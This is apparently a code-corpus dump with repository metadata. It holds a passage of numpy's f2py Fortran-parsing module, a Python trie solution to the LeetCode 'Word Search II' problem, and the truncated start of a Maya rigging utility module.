d2[0] - d1[0] if not a: return repr(b), None, None if b < 0: return '%s * %s - %s' % (a, d1[2], -b), d2[2], '+%s)/(%s)' % (-b, a) elif b: return '%s * %s + %s' % (a, d1[2], b), d2[2], '-%s)/(%s)' % (b, a) else: return '%s * %s' % (a, d1[2]), d2[2], ')/(%s)' % (a) if d1[0] == d2[0] == 1: c = str(d1[2]) if c not in args: if _varname_match(c): outmess('\tgetarrlen:variable "%s" undefined\n' % (c)) c = '(%s)' % c if b == 0: d = '%s-%s' % (d2[2], c) elif b < 0: d = '%s-%s-%s' % (d2[2], c, -b) else: d = '%s-%s+%s' % (d2[2], c, b) elif d1[0] == 0: c2 = str(d2[2]) if c2 not in args: if _varname_match(c2): outmess('\tgetarrlen:variable "%s" undefined\n' % (c2)) c2 = '(%s)' % c2 if d2[0] == 1: pass elif d2[0] == -1: c2 = '-%s' % c2 else: c2 = '%s*%s' % (d2[0], c2) if b == 0: d = c2 elif b < 0: d = '%s-%s' % (c2, -b) else: d = '%s+%s' % (c2, b) elif d2[0] == 0: c1 = str(d1[2]) if c1 not in args: if _varname_match(c1): outmess('\tgetarrlen:variable "%s" undefined\n' % (c1)) c1 = '(%s)' % c1 if d1[0] == 1: c1 = '-%s' % c1 elif d1[0] == -1: c1 = '+%s' % c1 elif d1[0] < 0: c1 = '+%s*%s' % (-d1[0], c1) else: c1 = '-%s*%s' % (d1[0], c1) if b == 0: d = c1 elif b < 0: d = '%s-%s' % (c1, -b) else: d = '%s+%s' % (c1, b) else: c1 = str(d1[2]) if c1 not in args: if _varname_match(c1): outmess('\tgetarrlen:variable "%s" undefined\n' % (c1)) c1 = '(%s)' % c1 if d1[0] == 1: c1 = '-%s' % c1 elif d1[0] == -1: c1 = '+%s' % c1 elif d1[0] < 0: c1 = '+%s*%s' % (-d1[0], c1) else: c1 = '-%s*%s' % (d1[0], c1) c2 = str(d2[2]) if c2 not in args: if _varname_match(c2): outmess('\tgetarrlen:variable "%s" undefined\n' % (c2)) c2 = '(%s)' % c2 if d2[0] == 1: pass elif d2[0] == -1: c2 = '-%s' % c2 else: c2 = '%s*%s' % (d2[0], c2) if b == 0: d = '%s%s' % (c2, c1) elif b < 0: d = '%s%s-%s' % (c2, c1, -b) else: d = '%s%s+%s' % (c2, c1, b) return d, None, None word_pattern = re.compile(r'\b[a-z][\w$]*\b', re.I) def _get_depend_dict(name, vars, deps): if name in vars: words = vars[name].get('depend', []) if '=' in vars[name] and not isstring(vars[name]): for word in word_pattern.findall(vars[name]['=']): if word not in words and word in vars: words.append(word) for word in words[:]: for w in deps.get(word, []) \ or _get_depend_dict(word, vars, deps): if w not in words: words.append(w) else: outmess('_get_depend_dict: no dependence info for %s\n' % (repr(name))) words = [] deps[name] = words return words def _calc_depend_dict(vars): names = list(vars.keys()) depend_dict = {} for n in names: _get_depend_dict(n, vars, depend_dict) return depend_dict def get_sorted_names(vars): """ """ depend_dict = _calc_depend_dict(vars) names = [] for name in list(depend_dict.keys()): if not depend_dict[name]: names.append(name) del depend_dict[name] while depend_dict: for name, lst in list(depend_dict.items()): new_lst = [n for n in lst if n in depend_dict] if not new_lst: names.append(name) del depend_dict[name] else: depend_dict[name] = new_lst return [name for name in names if name in vars] def _kind_func(string): # XXX: return something sensible. if string[0] in "'\"": string = string[1:-1] if real16pattern.match(string): return 8 elif real8pattern.match(string): return 4 return 'kind(' + string + ')' def _selected_int_kind_func(r): # XXX: This should be processor dependent m = 10 ** r if m <= 2 ** 8: return 1 if m <= 2 ** 16: return 2 if m <= 2 ** 32: return 4 if m <= 2 ** 63: return 8 if m <= 2 ** 128: return 16 return -1 def _selected_real_kind_func(p, r=0, radix=0): # XXX: This should be processor dependent # This is only good for 0 <= p <= 20 if p < 7: return 4 if p < 16: return 8 machine = platform.machine().lower() if machine.startswith(('aarch64', 'power', 'ppc', 'riscv', 's390x', 'sparc')): if p <= 20: return 16 else: if p < 19: return 10 elif p <= 20: return 16 return -1 def get_parameters(vars, global_params={}): params = copy.copy(global_params) g_params = copy.copy(global_params) for name, func in [('kind', _kind_func), ('selected_int_kind', _selected_int_kind_func), ('selected_real_kind', _selected_real_kind_func), ]: if name not in g_params: g_params[name] = func param_names = [] for n in get_sorted_names(vars): if 'attrspec' in vars[n] and 'parameter' in vars[n]['attrspec']: param_names.append(n) kind_re = re.compile(r'\bkind\s*\(\s*(?P<value>.*)\s*\)', re.I) selected_int_kind_re = re.compile( r'\bselected_int_kind\s*\(\s*(?P<value>.*)\s*\)', re.I) selected_kind_re = re.compile( r'\bselected_(int|real)_kind\s*\(\s*(?P<value>.*)\s*\)', re.I) for n in param_names: if '=' in vars[n]: v = vars[n]['='] if islogical(vars[n]): v = v.lower() for repl in [ ('.false.', 'False'), ('.true.', 'True'), # TODO: test .eq., .neq., etc replacements. ]: v = v.replace(*repl) v = kind_re.sub(r'kind("\1")', v) v = selected_int_kind_re.sub(r'selected_int_kind(\1)', v) # We need to act according to the data. # The easy case is if the data has a kind-specifier, # then we may easily remove those specifiers. # However, it may be that the user uses other specifiers...(!) is_replaced = False if 'kindselector' in vars[n]: if 'kind' in vars[n]['kindselector']: orig_v_len = len(v) v = v.replace('_' + vars[n]['kindselector']['kind'], '') # Again, this will be true if even a single specifier # has been replaced, see comment above. is_replaced = len(v) < orig_v_len if not is_replaced: if not selected_kind_re.match(v): v_ = v.split('_') # In case there are additive parameters if len(v_) > 1: v = ''.join(v_[:-1]).lower().replace(v_[-1].lower(), '') # Currently this will not work for complex numbers. # There is missing code for extracting a complex number, # which may be defined in either of these: # a) (Re, Im) # b) cmplx(Re, Im) # c) dcmplx(Re, Im) # d) cmplx(Re, Im, <prec>) if isdouble(vars[n]): tt = list(v) for m in real16pattern.finditer(v): tt[m.start():m.end()] = list( v[m.start():m.end()].lower().replace('d', 'e')) v = ''.join(tt) elif iscomplex(vars[n]): # FIXME complex numbers may also have exponents if v[0] == '(' and v[-1] == ')': # FIXME, unused l looks like potential bug l = markoutercomma(v[1:-1]).split('@,@') try: params[n] = eval(v, g_params, params) except Exception as msg: params[n] = v outmess('get_parameters: got "%s" on %s\n' % (msg, repr(v))) if isstring(vars[n]) and isinstance(params[n], int): params[n] = chr(params[n]) nl = n.lower() if nl != n: params[nl] = params[n] else: print(vars[n]) outmess( 'get_parameters:parameter %s does not have value?!\n' % (repr(n))) return params def _eval_length(length, params): if length in ['(:)', '(*)', '*']: return '(*)' return _eval_scalar(length, params) _is_kind_number = re.compile(r'\d+_').match def _eval_scalar(value, params): if _is_kind_number(value): value = value.split('_')[0] try: value = str(eval(value, {}, params)) except (NameError, SyntaxError, TypeError): return value except Exception as msg: errmess('"%s" in evaluating %r ' '(available names: %s)\n' % (msg, value, list(params.keys()))) return value def analyzevars(block): global f90modulevars setmesstext(block) implicitrules, attrrules = buildimplicitrules(block) vars = copy.copy(block['vars']) if block['block'] == 'function' and block['name'] not in vars: vars[block['name']] = {} if '' in block['vars']: del vars[''] if 'attrspec' in block['vars']['']: gen = block['vars']['']['attrspec'] for n in list(vars.keys()): for k in ['public', 'private']: if k in gen: vars[n] = setattrspec(vars[n], k) svars = [] args = block['args'] for a in args: try: vars[a] svars.append(a) except KeyError: pass for n in list(vars.keys()): if n not in args: svars.append(n) params = get_parameters(vars, get_useparameters(block)) dep_matches = {} name_match = re.compile(r'\w[\w\d_$]*').match for v in list(vars.keys()): m = name_match(v) if m: n = v[m.start():m.end()] try: dep_matches[n] except KeyError: dep_matches[n] = re.compile(r'.*\b%s\b' % (v), re.I).match for n in svars: if n[0] in list(attrrules.keys()): vars[n] = setattrspec(vars[n], attrrules[n[0]]) if 'typespec' not in vars[n]: if not('attrspec' in vars[n] and 'external' in vars[n]['attrspec']): if implicitrules: ln0 = n[0].lower() for k in list(implicitrules[ln0].keys()): if k == 'typespec' and implicitrules[ln0][k] == 'undefined': continue if k not in vars[n]: vars[n][k] = implicitrules[ln0][k] elif k == 'attrspec': for l in implicitrules[ln0][k]: vars[n] = setattrspec(vars[n], l) elif n in block['args']: outmess('analyzevars: typespec of variable %s is not defined in routine %s.\n' % ( repr(n), block['name'])) if 'charselector' in vars[n]: if 'len' in vars[n]['charselector']: l = vars[n]['charselector']['len'] try: l = str(eval(l, {}, params)) except Exception: pass vars[n]['charselector']['len'] = l if 'kindselector' in vars[n]: if 'kind' in vars[n]['kindselector']: l = vars[n]['kindselector']['kind'] try: l = str(eval(l, {}, params)) except Exception: pass vars[n]['kindselector']['kind'] = l savelindims = {} if 'attrspec' in vars[n]: attr = vars[n]['attrspec'] attr.reverse() vars[n]['attrspec'] = [] dim, intent, depend, check, note = None, None, None, None, None for a in attr: if a[:9] == 'dimension': dim = (a[9:].strip())[1:-1] elif a[:6] == 'intent': intent = (a[6:].strip())[1:-1] elif a[:6] == 'depend': depend = (a[6:].strip())[1:-1] elif a[:5] == 'check': check = (a[5:].strip())[1:-1] elif a[:4] == 'note': note = (a[4:].strip())[1:-1] else: vars[n] = setattrspec(vars[n], a) if intent: if 'intent' not in vars[n]: vars[n]['intent'] = [] for c in [x.strip() for x in markoutercomma(intent).split('@,@')]: # Remove spaces so that 'in out' becomes 'inout' tmp = c.replace(' ', '') if tmp not in vars[n]['intent']: vars[n]['intent'].append(tmp) intent = None if note: note = note.replace('\\n\\n', '\n\n') note = note.replace('\\n ', '\n') if 'note' not in vars[n]: vars[n]['note'] = [note] else: vars[n]['note'].append(note) note = None if depend is not None: if 'depend' not in vars[n]: vars[n]['depend'] = [] for c in rmbadname([x.strip() for x in markoutercomma(depend).split('@,@')]): if c not in vars[n]['depend']: vars[n]['depend'].append(c) depend = None if check is not None: if 'check' not in vars[n]: vars[n]['check'] = [] for c in [x.strip() for x in markoutercomma(check).split('@,@')]: if c not in vars[n]['check']: vars[n]['check'].append(c) check = None if dim and 'dimension' not in vars[n]: vars[n]['dimension'] = [] for d in rmbadname([x.strip() for x in markoutercomma(dim).split('@,@')]): star = '*' if d == ':': star = ':' if d in params: d = str(params[d]) for p in list(params.keys()): re_1 = re.compile(r'(?P<before>.*?)\b' + p + r'\b(?P<after>.*)', re.I) m = re_1.match(d) while m: d = m.group('before') + \ str(params[p]) + m.group('after') m = re_1.match(d) if d == star: dl = [star] else: dl = markoutercomma(d, ':').split('@:@') if len(dl) == 2 and '*' in dl: # e.g. dimension(5:*) dl = ['*'] d = '*' if len(dl) == 1 and not dl[0] == star: dl = ['1', dl[0]] if len(dl) == 2: d, v, di = getarrlen(dl, list(block['vars'].keys())) if d[:4] == '1 * ': d = d[4:] if di and di[-4:] == '/(1)': di = di[:-4] if v: savelindims[d] = v, di vars[n]['dimension'].append(d) if 'dimension' in vars[n]: if isintent_c(vars[n]): shape_macro = 'shape' else: shape_macro = 'shape' # 'fshape' if isstringarray(vars[n]): if 'charselector' in vars[n]: d = vars[n]['charselector'] if '*' in d: d = d['*'] errmess('analyzevars: character array "character*%s %s(%s)" is considered as "character %s(%s)"; "intent(c)" is forced.\n' % (d, n, ','.join(vars[n]['dimension']), n, ','.join(vars[n]['dimension'] + [d]))) vars[n]['dimension'].append(d) del vars[n]['charselector'] if 'intent' not in vars[n]: vars[n]['intent'] = [] if 'c' not in vars[n]['intent']: vars[n]['intent'].append('c') else: errmess( "analyzevars: charselector=%r unhandled." % (d)) if 'check' not in vars[n] and 'args' in block and n in block['args']: flag = 'depend' not in vars[n] if flag: vars[n]['depend'] = [] vars[n]['check'] = [] if 'dimension' in vars[n]: #/----< no check i = -1 ni = len(vars[n]['dimension']) for d in vars[n]['dimension']: ddeps = [] # dependencies of 'd' ad = '' pd = '' if d not in vars: if d in savelindims: pd, ad = '(', savelindims[d][1] d = savelindims[d][0] else: for r in block['args']: if r not in vars: continue if re.match(r'.*?\b' + r + r'\b', d, re.I): ddeps.append(r) if d in vars: if 'attrspec' in vars[d]: for aa in vars[d]['attrspec']: if aa[:6] == 'depend': ddeps += aa[6:].strip()[1:-1].split(',') if 'depend' in vars[d]: ddeps = ddeps + vars[d]['depend'] i = i + 1 if d in vars and ('depend' not in vars[d]) \ and ('=' not in vars[d]) and (d not in vars[n]['depend']) \ and l_or(isintent_in, isintent_inout, isintent_inplace)(vars[n]): vars[d]['depend'] = [n] if ni > 1: vars[d]['='] = '%s%s(%s,%s)%s' % ( pd, shape_macro, n, i, ad) else: vars[d]['='] = '%slen(%s)%s' % (pd, n, ad) # /---< no check if 1 and 'check' not in vars[d]: if ni > 1: vars[d]['check'] = ['%s%s(%s,%i)%s==%s' % (pd, shape_macro, n, i, ad, d)] else: vars[d]['check'] = [ '%slen(%s)%s>=%s' % (pd, n, ad, d)] if 'attrspec' not in vars[d]: vars[d]['attrspec'] = ['optional'] if ('optional' not in vars[d]['attrspec']) and\ ('required' not in vars[d]['attrspec']): vars[d]['attrspec'].append('optional') elif d not in ['*', ':']: #/----< no check if flag: if d in vars: if n not in ddeps: vars[n]['depend'].append(d) else: vars[n]['depend'] = vars[n]['depend'] + ddeps elif isstring(vars[n]): length = '1' if 'charselector' in vars[n]: if '*' in vars[n]['charselector']: length = _eval_length(vars[n]['charselector']['*'], params) vars[n]['charselector']['*'] = length elif 'len' in vars[n]['charselector']: length = _eval_length(vars[n]['charselector']['len'], params) del vars[n]['charselector']['len'] vars[n]['charselector']['*'] = length if not vars[n]['check']: del vars[n]['check'] if flag and not vars[n]['depend']: del vars[n]['depend'] if '=' in vars[n]: if 'attrspec' not in vars[n]: vars[n]['attrspec'] = [] if ('optional' not in vars[n]['attrspec']) and \ ('required' not in vars[n]['attrspec']): vars[n]['attrspec'].append('optional') if 'depend' not in vars[n]: vars[n]['depend'] = [] for v, m in list(dep_matches.items()): if m(vars[n]['=']): vars[n]['depend'].append(v) if not vars[n]['depend']: del vars[n]['depend'] if isscalar(vars[n]): vars[n]['='] = _eval_scalar(vars[n]['='], params) for n in list(vars.keys()): if n == block['name']: # n is block name if 'note' in vars[n]: block['note'] = vars[n]['note'] if block['block'] == 'function': if 'result' in block and block['result'] in vars: vars[n] = appenddecl(vars[n], vars[block['result']]) if 'prefix' in block: pr = block['prefix'] ispure = 0 isrec = 1 pr1 = pr.replace('pure', '') ispure = (not pr == pr1) pr = pr1.replace('recursive', '') isrec = (not pr == pr1) m = typespattern[0].match(pr) if m: typespec, selector, attr, edecl = cracktypespec0( m.group('this'), m.group('after')) kindselect, charselect, typename = cracktypespec( typespec, selector) vars[n]['typespec'] = typespec if kindselect: if 'kind' in kindselect: try: kindselect['kind'] = eval( kindselect['kind'], {}, params) except Exception: pass vars[n]['kindselector'] = kindselect if charselect: vars[n]['charselector'] = charselect if typename: vars[n]['typename'] = typename if ispure: vars[n] = setattrspec(vars[n], 'pure') if isrec: vars[n] = setattrspec(vars[n], 'recursive') else: outmess( 'analyzevars: prefix (%s) were not used\n' % repr(block['prefix'])) if not block['block'] in ['module', 'pythonmodule', 'python module', 'block data']: if 'commonvars' in block: neededvars = copy.copy(block['args'] + block['commonvars']) else: neededvars = copy.copy(block['args']) for n in list(vars.keys()): if l_or(isintent_callback, isintent_aux)(vars[n]): neededvars.append(n) if 'entry' in block: neededvars.extend(list(block['entry'].keys())) for k in list(block['entry'].keys()): for n in block['entry'][k]: if n not in neededvars: neededvars.append(n) if block['block'] == 'function': if 'result' in block: neededvars.append(block['result']) else: neededvars.append(block['name']) if block['block'] in ['subroutine', 'function']: name = block['name'] if name in vars and 'intent' in vars[name]: block['intent'] = vars[name]['intent'] if block['block'] == 'type': neededvars.extend(list(vars.keys())) for n in list(vars.keys()): if n not in neededvars: del vars[n] return vars analyzeargs_re_1 = re.compile(r'\A[a-z]+[\w$]*\Z', re.I) def expr2name(a, block, args=[]): orig_a = a a_is_expr = not analyzeargs_re_1.match(a) if a_is_expr: # `a` is an expression implicitrules, attrrules = buildimplicitrules(block) at = determineexprtype(a, block['vars'], implicitrules) na = 'e_' for c in a: c = c.lower() if c not in string.ascii_lowercase + string.digits: c = '_' na = na + c if na[-1] == '_': na = na + 'e' else: na = na + '_e' a = na while a in block['vars'] or a in block['args']: a = a + 'r' if a in args: k = 1 while a + str(k) in args: k = k + 1 a = a + str(k) if a_is_expr: block['vars'][a] = at else: if a not in block['vars']: if orig_a in block['vars']: block['vars'][a] = block['vars'][orig_a] else: block['vars'][a] = {} if 'externals' in block and orig_a in block['externals'] + block['interfaced']: block['vars'][a] = setattrspec(block['vars'][a], 'external') return a def analyzeargs(block): setmesstext(block) implicitrules, attrrules = buildimplicitrules(block) if 'args' not in block: block['args'] = [] args = [] for a in block['args']: a = expr2name(a, block, args) args.append(a) block['args'] = args if 'entry' in block: for k, args1 in list(block['entry'].items()): for a in args1: if a not in block['vars']: block['vars'][a] = {} for b in block['body']: if b['name'] in args: if 'externals' not in block: block['externals'] = [] if b['name'] not in block['externals']: block['externals'].append(b['name']) if 'result' in block and block['result'] not in block['vars']: block['vars'][block['result']] = {} return block determineexprtype_re_1 = re.compile(r'\A\(.+?[,].+?\)\Z', re.I) determineexprtype_re_2 = re.compile(r'\A[+-]?\d+(_(?P<name>[\w]+)|)\Z', re.I) determineexprtype_re_3 = re.compile( r'\A[+-]?[\d.]+[\d+\-de.]*(_(?P<name>[\w]+)|)\Z', re.I) determineexprtype_re_4 = re.compile(r'\A\(.*\)\Z', re.I) determineexprtype_re_5 = re.compile(r'\A(?P<name>\w+)\s*\(.*?\)\s*\Z', re.I) def _ensure_exprdict(r): if isinstance(r, int): return {'typespec': 'integer'} if isinstance(r, float): return {'typespec': 'real'} if isinstance(r, complex): return {'typespec': 'complex'} if isinstance(r, dict): return r raise AssertionError(repr(r)) def determineexprtype(expr, vars, rules={}): if expr in vars: return _ensure_exprdict(vars[expr]) expr = expr.strip() if determineexprtype_re_1.match(expr): return {'typespec': 'complex'} m = determineexprtype_re_2.match(expr) if m: if 'name' in m.groupdict() and m.group('name'): outmess( 'determineexprtype: selected kind types not supported (%s)\n' % repr(expr)) return {'typespec': 'integer'} m = determineexprtype_re_3.match(expr) if m: if 'name' in m.groupdict() and m.group('name'): outmess( 'determineexprtype: selected kind types not supported (%s)\n' % repr(expr)) return {'typespec': 'real'} for op in ['+', '-', '*', '/']: for e in [x.strip() for x in markoutercomma(expr, comma=op).split('@' + op + '@')]: if e in vars: return _ensure_exprdict(vars[e]) t = {} if determineexprtype_re_4.match(expr): # in parenthesis t = determineexprtype(expr[1:-1], vars, rules) else: m = determineexprtype_re_5.match(expr) if m: rn = m.group('name') t = determineexprtype(m.group('name'), vars, rules) if t and 'attrspec' in t: del t['attrspec'] if not t: if rn[0] in rules: return _ensure_exprdict(rules[rn[0]]) if expr[0] in '\'"': return {'typespec': 'character', 'charselector': {'*': '*'}} if not t: outmess( 'determineexprtype: could not determine expressions (%s) type.\n' % (repr(expr))) return t ###### def crack2fortrangen(block, tab='\n', as_interface=False): global skipfuncs, onlyfuncs setmesstext(block) ret = '' if isinstance(block, list): for g in block: if g and g['block'] in ['function', 'subroutine']: if g['name'] in skipfuncs: continue if onlyfuncs and g['name'] not in onlyfuncs: continue ret = ret + crack2fortrangen(g, tab, as_interface=as_interface) return ret prefix = '' name = '' args = '' blocktype = block['block'] if blocktype == 'program': return '' argsl = [] if 'name' in block: name = block['name'] if 'args' in block: vars = block['vars'] for a in block['args']: a = expr2name(a, block, argsl) if not isintent_callback(vars[a]): argsl.append(a) if block['block'] == 'function' or argsl: args = '(%s)' % ','.join(argsl) f2pyenhancements = '' if 'f2pyenhancements' in block: for k in list(block['f2pyenhancements'].keys()): f2pyenhancements = '%s%s%s %s' % ( f2pyenhancements, tab + tabchar, k, block['f2pyenhancements'][k]) intent_lst = block.get('intent', [])[:] if blocktype == 'function' and 'callback' in intent_lst: intent_lst.remove('callback') if intent_lst: f2pyenhancements = '%s%sintent(%s) %s' %\ (f2pyenhancements, tab + tabchar, ','.join(intent_lst), name) use = '' if 'use' in block: use = use2fortran(block['use'], tab + tabchar) common = '' if 'common' in block: common = common2fortran(block['common'], tab + tabchar) if name == 'unknown_interface': name = '' result = '' if 'result' in block: result = ' result (%s)' % block['result'] if block['result'] not in argsl: argsl.append(block['result']) body = crack2fortrangen(block['body'], tab + tabchar) vars = vars2fortran( block, block['vars'], argsl, tab + tabchar, as_interface=as_interface) mess = '' if 'from' in block and not as_interface: mess = '! in %s' % block['from'] if 'entry' in block: entry_stmts = '' for k, i in list(block['entry'].items()): entry_stmts = '%s%sentry %s(%s)' \ % (entry_stmts, tab + tabchar, k, ','.join(i)) body = body + entry_stmts if blocktype == 'block data' and name == '_BLOCK_DATA_': name = '' ret = '%s%s%s %s%s%s %s%s%s%s%s%s%send %s %s' % ( tab, prefix, blocktype, name, args, result, mess, f2pyenhancements, use, vars, common, body, tab, blocktype, name) return ret def common2fortran(common, tab=''): ret = '' for k in list(common.keys()): if k == '_BLNK_': ret = '%s%scommon %s' % (ret, tab, ','.join(common[k])) else: ret = '%s%scommon /%s/ %s' % (ret, tab, k, ','.join(common[k])) return ret def use2fortran(use, tab=''): ret = '' for m in list(use.keys()): ret = '%s%suse %s,' % (ret, tab, m) if use[m] == {}: if ret and ret[-1] == ',': ret = ret[:-1] continue if 'only' in use[m] and use[m]['only']: ret = '%s only:' % (ret) if 'map' in use[m] and use[m]['map']: c = ' ' for k in list(use[m]['map'].keys()): if k == use[m]['map'][k]: ret = '%s%s%s' % (ret, c, k) c = ',' else: ret = '%s%s%s=>%s' % (ret, c, k, use[m]['map'][k]) c = ',' if ret and ret[-1] == ',': ret = ret[:-1] return ret def true_intent_list(var): lst = var['intent'] ret = [] for intent in lst: try: f = globals()['isintent_%s' % intent] except KeyError: pass else: if f(var): ret.append(intent) return ret def vars2fortran(block, vars, args, tab='', as_interface=False): """ TODO: public sub ... """ setmesstext(block) ret = '' nout = [] for a in args: if a in block['vars']: nout.append(a) if 'commonvars' in block: for a in block['commonvars']: if a in vars: if a not in nout: nout.append(a) else: errmess( 'vars2fortran: Confused?!: "%s" is not defined in vars.\n' % a) if 'varnames' in block: nout.extend(block['varnames']) if not as_interface: for a in list(vars.keys()): if a not in nout: nout.append(a) for a in nout: if 'depend' in vars[a]: for d in vars[a]['depend']: if d in vars and 'depend' in vars[d] and a in vars[d]['depend']: errmess( 'vars2fortran: Warning: cross-dependence between variables "%s" and "%s"\n' % (a, d)) if 'externals' in block and a in block['externals']: if isintent_callback(vars[a]): ret = '%s%sintent(callback) %s' % (ret, tab, a) ret = '%s%sexternal %s' % (ret, tab, a) if isoptional(vars[a]): ret = '%s%soptional %s' % (ret, tab, a) if a in vars and 'typespec' not in vars[a]: continue cont = 1 for b in block['body']: if a == b['name'] and b['block'] == 'function': cont = 0 break if cont: continue if a not in vars: show(vars) outmess('vars2fortran: No definition for argument "%s".\n' % a) continue if a == block['name'] and not block['block'] == 'function': continue if 'typespec' not in vars[a]: if 'attrspec' in vars[a] and 'external' in vars[a]['attrspec']: if a in args: ret = '%s%sexternal %s' % (ret, tab, a) continue show(vars[a]) outmess('vars2fortran: No typespec for argument "%s".\n' % a) continue vardef = vars[a]['typespec'] if vardef == 'type' and 'typename' in vars[a]: vardef = '%s(%s)' % (vardef, vars[a]['typename']) selector = {} if 'kindselector' in vars[a]: selector = vars[a]['kindselector'] elif 'charselector' in vars[a]: selector = vars[a]['charselector'] if '*' in selector: if selector['*'] in ['*', ':']: vardef = '%s*(%s)' % (vardef, selector['*']) else: vardef = '%s*%s' % (vardef, selector['*']) else: if 'len' in selector: vardef = '%s(len=%s' % (vardef, selector['len']) if 'kind' in selector: vardef = '%s,kind=%s)' % (vardef, selector['kind']) else: vardef = '%s)' % (vardef) elif 'kind' in selector: vardef = '%s(kind=%s)' % (vardef, selector['kind']) c = ' ' if 'attrspec' in vars[a]: attr = [l for l in vars[a]['attrspec'] if l not in ['external']] if attr: vardef = '%s, %s' % (vardef, ','.join(attr)) c = ',' if 'dimension' in vars[a]: vardef = '%s%sdimension(%s)' % ( vardef, c, ','.join(vars[a]['dimension'])) c = ',' if 'intent' in vars[a]: lst = true_intent_list(vars[a]) if lst: vardef = '%s%sintent(%s)' % (vardef, c, ','.join(lst)) c = ',' if 'check' in vars[a]: vardef = '%s%scheck(%s)' % (vardef, c, ','.join(vars[a]['check'])) c = ',' if 'depend' in vars[a]: vardef = '%s%sdepend(%s)' % ( vardef, c, ','.join(vars[a]['depend'])) c = ',' if '=' in vars[a]: v = vars[a]['='] if vars[a]['typespec'] in ['complex', 'double complex']: try: v = eval(v) v = '(%s,%s)' % (v.real, v.imag) except Exception: pass vardef = '%s :: %s=%s' % (vardef, a, v) else: vardef = '%s :: %s' % (vardef, a) ret = '%s%s%s' % (ret, tab, vardef) return ret ###### def crackfortran(files): global usermodules outmess('Reading fortran codes...\n', 0) readfortrancode(files, crackline) outmess('Post-processing...\n', 0) usermodules = [] postlist = postcrack(grouplist[0]) outmess('Post-processing (stage 2)...\n', 0) postlist = postcrack2(postlist) return usermodules + postlist def crack2fortran(block): global f2py_version pyf = crack2fortrangen(block) + '\n' header = """! -*- f90 -*- ! Note: the context of this file is case sensitive. """ footer = """ ! This file was auto-generated with f2py (version:%s). ! See http://cens.ioc.ee/projects/f2py2e/ """ % (f2py_version) return header + pyf + footer if __name__ == "__main__": files = [] funcs = [] f = 1 f2 = 0 f3 = 0 showblocklist = 0 for l in sys.argv[1:]: if l == '': pass elif l[0] == ':': f = 0 elif l == '-quiet': quiet = 1 verbose = 0 elif l == '-verbose': verbose = 2 quiet = 0 elif l == '-fix': if strictf77: outmess( 'Use option -f90 before -fix if Fortran 90 code is in fix form.\n', 0) skipemptyends = 1 sourcecodeform = 'fix' elif l == '-skipemptyends': skipemptyends = 1 elif l == '--ignore-contains': ignorecontains = 1 elif l == '-f77': strictf77 = 1 sourcecodeform = 'fix' elif l == '-f90': strictf77 = 0 sourcecodeform = 'free' skipemptyends = 1 elif l == '-h': f2 = 1 elif l == '-show': showblocklist = 1 elif l == '-m': f3 = 1 elif l[0] == '-': errmess('Unknown option %s\n' % repr(l)) elif f2: f2 = 0 pyffilename = l elif f3: f3 = 0 f77modulename = l elif f: try: open(l).close() files.append(l) except IOError as detail: errmess('IOError: %s\n' % str(detail)) else: funcs.append(l) if not strictf77 and f77modulename and not skipemptyends: outmess("""\ Warning: You have specified module name for non Fortran 77 code that should not need one (expect if you are scanning F90 code for non module blocks but then you should use flag -skipemptyends and also be sure that the files do not contain programs without program statement). """, 0) postlist = crackfortran(files) if pyffilename: outmess('Writing fortran code to file %s\n' % repr(pyffilename), 0) pyf = crack2fortran(postlist) with open(pyffilename, 'w') as f: f.write(pyf) if showblocklist: show(postlist)
bsd-3-clause
7,846,563,131,492,437,000
37.362383
207
0.469806
false
3.83073
false
false
false
guozengxin/myleetcode
python/wordSearchII.py
1
2827
# https://leetcode.com/problems/word-search-ii/ class Solution(object): def findWords(self, board, words): """ :type board: List[List[str]] :type words: List[str] :rtype: List[str] """ trie = Trie() for w in words: trie.insert(w) res = set() for i in xrange(len(board)): for j in xrange(len(board[i])): visited = set() self.dfs(board, trie.root, i, j, visited, res) return list(res) def dfs(self, board, trieNode, i, j, visited, res): if (i, j) in visited: return if (i < 0 or j < 0 or i >= len(board) or j >= len(board[i])): return cur = board[i][j] if cur in trieNode.nodes: if trieNode.nodes[cur].isLeaf: res.add(trieNode.nodes[cur].word) visited.add((i, j)) self.dfs(board, trieNode.nodes[cur], i+1, j, visited, res) self.dfs(board, trieNode.nodes[cur], i, j+1, visited, res) self.dfs(board, trieNode.nodes[cur], i-1, j, visited, res) self.dfs(board, trieNode.nodes[cur], i, j-1, visited, res) visited.remove((i, j)) class TrieNode(object): def __init__(self): """ Initialize your data structure here. """ self.nodes = {} self.word = '' self.isLeaf = False class Trie(object): def __init__(self): self.root = TrieNode() def insert(self, word): """ Inserts a word into the trie. :type word: str :rtype: void """ node = self.root for c in word: if c in node.nodes: node = node.nodes[c] else: newNode = TrieNode() node.nodes[c] = newNode node = newNode node.isLeaf = True node.word = word def search(self, word): """ Returns if the word is in the trie. :type word: str :rtype: bool """ node = self.root for c in word: if c in node.nodes: node = node.nodes[c] else: return False return node.isLeaf def startsWith(self, prefix): """ Returns if there is any word in the trie that starts with the given prefix. :type prefix: str :rtype: bool """ node = self.root for c in prefix: if c in node.nodes: node = node.nodes[c] else: return False return True board = [ ['o','a','a','n'], ['e','t','a','e'], ['i','h','k','r'], ['i','f','l','v'] ] words = ["oath","pea","eat","rain"] s = Solution() print s.findWords(board, words)
mit
7,831,944,678,315,443,000
24.25
70
0.474708
false
3.638353
false
false
false
Leopardob/Kistie
kcode/kcore/KstMaya.py
1
28693
''' K.I.S.T.I.E (Keep, It, Simple, Take, It, Easy) Created on 1 Jan 2013 @author: Leonardo Bruni, leo.b2003@gmail.com Kistie Maya Module Library This Kistie implementation i's part of project 'Kistie_Autorig' by Leonardo Bruni, leo.b2003@gmail.com ''' #ToDo: implement a debug mode for print or not import pymel as pm # import pymel lib import maya.cmds as cmds # import maya cmds lib import maya.mel as mel # import maya mel lib import maya.OpenMaya as om # Import kstCore import kcode.kcore.KstCore as _KstCore_ reload(_KstCore_) KstCore = _KstCore_.KstCore() # Import kstMath import kcode.kmath.KstMath as _KstMath_ reload(_KstMath_) KstMath = _KstMath_.KstMath() # Import KstOut import kcode.kcore.KstOut as _KstOut_ reload(_KstOut_) KstOut = _KstOut_.KstOut() class KstMaya(object): # Debug module name variable _debug = 'KstMaya' def __init__(self): KstOut.debug('Kistie Maya function module loaded... ') # Channels Operation method def channels_op(self, selections, channels_list, *args): ''' Desc: Make operation on channels Parameter: selections = list of selection where perform operations *args = type of operation (lock, hide) channels_list = list of channels to perform operations Return void Example: KstMaya.channels_op(['selection'], ['ch','ch','ch'], 'lock=Bool', 'keyable=Bool', 'channelBox=Bool') ''' # Declare variable for errors errors_list = [] # Check if selections type 